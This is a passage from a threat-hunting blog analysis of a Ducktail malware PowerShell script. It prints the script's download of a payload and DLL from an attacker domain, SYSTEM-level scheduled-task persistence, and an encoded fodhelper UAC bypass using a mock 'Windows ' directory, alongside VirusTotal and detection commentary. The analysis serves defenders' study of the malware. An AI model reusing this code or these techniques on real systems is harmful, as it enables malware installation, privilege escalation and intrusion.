On the other hand, the code has a second important part. I comment on it with ### in the code:

### Download of a very suspicious payload ###
Download-FileWithRetry -url "<http://datatranfer.online/file/t/mainbot.exe>" -destination "C:\\\\Windows\\\\Temp\\\\svczHost.exe"; ### it saves it as a name very similar to the windows binary "svchost.exe", key in many system operations. This is a first-rate hacker *masquerading*.###

### Persistence through scheduled task ###
Write-Host "add task";
$action = New-ScheduledTaskAction -Execute "C:\\\\Windows\\\\Temp\\\\svczHost.exe" -Argument "chubedan datatranfer.online";

### Of course, scheduled task where we slip a privilege escalation, to the user with the most privileges in the system, even more than an "admin", the SYSTEM###
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest;
$trigger = New-ScheduledTaskTrigger -AtLogOn;
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries;

### Strange name to not attract attention ###
Unregister-ScheduledTask -TaskName "zServicechubedan" -Confirm:$false;
Register-ScheduledTask -Action $action -Principal $principal -Trigger $trigger -Settings $settings -TaskName "zServicechubedan" -Description "Windows helper"; ### But yes, the description, that seems something harmless ###
Write-Host "run task";
Start-ScheduledTask -TaskName "zServicechubedan";

As we can see, this code is a real gem. Here is a virustotal collection on Ducktail, where you can find a copy of the “mainbot-svcZhost”, to take a look without having to download it. To continue with this part of the analysis, I will take this sample.

Without going into an extensive analysis, which would be enough for another whole post, I would like to show you this subtle detail that can be seen in the sandbox results:

Changing PowerShell.exe to pwsh.exe (PowerShell version 6), may seem trivial, but it is actually a significant change, becauuuuseee many manual detection rules could be affected. However, the execution is exactly the same. That’s why it’s important to make the rules “well”, when we implement a use case, not only taking what we see, but everything that can be run.

Returning to our analysis, let’s go to the next part of the code:

else
{
Write-Host "bypass uac run cmd";
Start-process "powershell.exe" -ArgumentList ("-EncodedCommand UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAYwBtAGQALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACgAIgAvAGMAIABtAGsAZABpAHIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAIgAiACAAJgAgAG0AawBkAGkAcgAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAAiACIAIAAmACAAYwBvAHAAeQAgACIAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAdABlAG0AMwAyAFwAZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQAiACIAIAAiACIAQwA6AFwAVwBpAG4AZABvAHcAcwAgAFwAUwB5AHMAdABlAG0AMwAyAFwAIgAiACIAKQAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAgAC0AVwBhAGkAdAA7AA==") -WindowStyle Hidden -Wait;

Here’s the result, and I tell you, our attacker is an old school, not only for the detail of the execution:

Start-Process "cmd.exe" -ArgumentList ("/c mkdir ""C:\\\\Windows \\\\"" & mkdir ""C:\\\\Windows \\\\System32\\\\"" & copy ""C:\\\\Windows\\\\System32\\\\**fodhelper.exe**"" ""C:**\\\\Windows \\\\**System32\\\\""") -WindowStyle Hidden  -Wait;

Here we have two techniques, one of dog, the space after Windows when copying fodhelper, which means that this folder is not “Windows”, it’s “Windows “. Do you see the difference? Another masquerading. The second one is not the Windows folder, but anyone who sees it will think it is.

It also copies fodhelper. Copy binaries from system32 to other locations, another classic.

Here is an explanation why he uses fodhelper. Look at the date, and you will understand why our attacker looks like an old schooler.

The next piece of code is the “final”. Final for this post. And it’s an “important” one:

while($true){
Write-Host "download file";
Download-FileFromUrl -Url "<http://datatranfer.online/api/filedata/dll/7339ea9b8c9c2b7ccd2b7f7977456b41>" -Destination "C:\\Windows \\System32\\propsys.dll";
Write-Host "Start Temp";
$command = "/c ""C:\\Windows \\System32\\fodhelper.exe""";
Write-Host $command;
$cmdName = "cmd.exe";
Write-Host $cmdName;
$mtx_randomMutex= New-Object System.Threading.Mutex($false, "MyRandomMutex");
$mtx_randomMutex.WaitOne(0);
Start-Sleep -Seconds 1;
write-host "start process, wait stop";
Start-Process $cmdName -ArgumentList ($command) -WindowStyle Hidden;
Start-Sleep -Seconds 2;

In this sample, based on the results of the datatranfer.online domain in virustotal, many conclusions can be drawn. Such as that this sample can be downloaded without using the PowerShell user-agent. This does not allow to download it from any place, for example, virustotal.

Here you can see the result.

As you will see, when VT treats something as a URL, it does not leave it quite fine if it has a file, as in this case, so I recommend in these cases, to analyze the body in the “details” section. In my case, since I have already given it, it appears as “go to analysis”:

Virustotal information from URL

Now we have our file better analyzed. I will leave you with a couple of details that I have been able to extract. In my case, I downloaded the sandbox PCAP which is only available in the paid version of VT. And I have seen a network connection, which is not visible to the naked eye (CAPE already tells us that there is something there that it has not seen):

PCAP from virustotal CAPE sandbox

On the other hand, by means of the “file written”, I have arrived at this. Could it be a coincidence? I will read you in the comments.

And finally, I think that our payload is still doing its thing, stretching the chewing gum, to complicate the detection by diversifying into different processes:

Here is an analysis of eSentire, where they talk about another part of Ducktail, the one that talks about RDP Wrapped, another feature of Ducktail that we have not seen in this analysis, but that is common in some of the samples that I have analyzed.

Also, from the files related to this sample, some Ransomware sample is seen, which without going into the in-depth intelligence part, gives food for thought….

Happy Hunting!

--

--

Cristóbal Martínez

Creator of The Hunter's Framework, the best framework for Threat Hunting. Cyber Threat Hunter and cybersecurity technian and consultant.